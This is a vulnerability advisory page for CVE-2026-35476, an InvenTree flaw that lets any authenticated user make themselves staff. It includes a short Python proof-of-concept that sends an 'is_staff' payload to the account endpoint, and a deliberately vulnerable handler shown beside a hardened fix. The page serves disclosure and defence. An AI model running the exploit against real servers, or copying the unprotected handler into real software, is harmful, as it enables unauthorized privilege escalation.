Security Vulnerability Report
CVE-2026-35476 CVSS 7.2 HIGH

Published: 2026-04-08 20:16:24
Last Modified: 2026-04-21 13:34:40

Description

InvenTree is an Open Source Inventory Management System. Prior to 1.2.7 and 1.3.0, a non-staff authenticated user can elevate their account to a staff level via a POST request against their user account endpoint. The write permissions on the API endpoint are improperly configured, allowing any user to change their staff status. This vulnerability is fixed in 1.2.7 and 1.3.0.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:* - VULNERABLE
InvenTree < 1.2.7
InvenTree < 1.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (may vary based on deployment)
target_url = "http://target-domain.com/api/user/account/"

# Attacker's credentials or session token
headers = {
    "Authorization": "Token <YOUR_AUTH_TOKEN>",
    "Content-Type": "application/json"
}

# Payload to exploit the permission misconfiguration
payload = {
    "is_staff": True
}

try:
    # Send POST request to elevate privileges
    response = requests.post(target_url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Privilege escalation successful! User is now staff.")
    else:
        print(f"[-] Failed. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] Error: {e}")
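The defect class behind this advisory (CWE-285, improper authorization: an account endpoint whose write permissions do not distinguish privileged fields from self-editable ones) is easier to reason about, and to test a fix for, in isolation. The following is an added example written for this page; it is not InvenTree's code, and the data model, field lists and handler names are constructed. It places a handler that writes every submitted field next to one that enforces per-field write permissions, and runs the same `{"is_staff": true}` payload through both.

```python
"""Field-level write permissions on a self-service account endpoint.

Constructed illustration of the misconfiguration described in the advisory
(CWE-285): an update handler that lets any authenticated caller set
``is_staff`` on their own account, next to a handler that enforces per-field
write permissions. Model, field names and handlers are hypothetical and are
not InvenTree's code.
"""
from dataclasses import dataclass


class PermissionDenied(Exception):
    """Raised when the acting user may not perform the requested write."""


@dataclass
class User:
    username: str
    email: str = ""
    is_staff: bool = False


# Fields a user may edit on their own account (constructed list).
SELF_EDITABLE = frozenset({"email"})
# Privileged fields: writable only by an actor who is already staff.
STAFF_ONLY = frozenset({"is_staff"})


def update_account_vulnerable(actor: User, target: User, payload: dict) -> User:
    """Writes every payload field the model has; 'is_staff' is not protected.

    This is the shape of the misconfiguration the advisory describes: the
    endpoint is writable with no per-field authorization, so the actor is
    never consulted.
    """
    for name, value in payload.items():
        if hasattr(target, name):
            setattr(target, name, value)
    return target


def update_account_hardened(actor: User, target: User, payload: dict) -> User:
    """Applies the payload only after per-field authorization checks.

    Fails closed: unknown fields are rejected, privileged fields require a
    staff actor, and only staff may edit someone else's account.
    """
    requested = set(payload)
    unknown = requested - SELF_EDITABLE - STAFF_ONLY
    if unknown:
        raise PermissionDenied(f"unknown or read-only fields: {sorted(unknown)}")
    if actor is not target and not actor.is_staff:
        raise PermissionDenied("only staff may edit another user's account")
    privileged = requested & STAFF_ONLY
    if privileged and not actor.is_staff:
        raise PermissionDenied(f"staff permission required for {sorted(privileged)}")
    for name, value in payload.items():
        setattr(target, name, value)
    return target


def hardened_allows(actor: User, target: User, payload: dict) -> bool:
    """True if the hardened handler accepts the write, False if it rejects it."""
    try:
        update_account_hardened(actor, target, dict(payload))
        return True
    except PermissionDenied:
        return False


def demo() -> tuple:
    """Runs the escalation payload through both handlers.

    Returns (is_staff after the vulnerable handler, is_staff after the
    hardened handler) for a freshly created non-staff user in each case.
    """
    payload = {"is_staff": True}  # constructed payload, same field as the PoC above
    alice = User("alice")
    update_account_vulnerable(alice, alice, payload)
    bob = User("bob")
    hardened_allows(bob, bob, payload)  # rejected, bob is unchanged
    return alice.is_staff, bob.is_staff


if __name__ == "__main__":
    print(demo())  # expected: (True, False)
```

The hardened handler checks the acting user, not just the target, and treats any field outside the two allow-lists as an error rather than silently ignoring it; both choices are what a regression test for the fixed versions should assert on.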

References

https://docs.inventree.org/en/stable/concepts/threat_model/#assumed-trust (Product)
https://github.com/inventree/InvenTree/security/advisories/GHSA-r8q5-3595-3jh2 (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35476", "sourceIdentifier": "[email protected]", "published": "2026-04-08T20:16:24.323", "lastModified": "2026-04-21T13:34:40.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvenTree is an Open Source Inventory Management System. Prior to 1.2.7 and 1.3.0, a non-staff authenticated user can elevate their account to a staff level via a POST request against their user account endpoint. The write permissions on the API endpoint are improperly configured, allowing any user to change their staff status. This vulnerability is fixed in 1.2.7 and 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.2.6", "matchCriteriaId": "E37FC80D-0C3A-425E-A35A-A8EA3B0B4F15"}]}]}], "references": [{"url": 
"https://docs.inventree.org/en/stable/concepts/threat_model/#assumed-trust", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/inventree/InvenTree/security/advisories/GHSA-r8q5-3595-3jh2", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}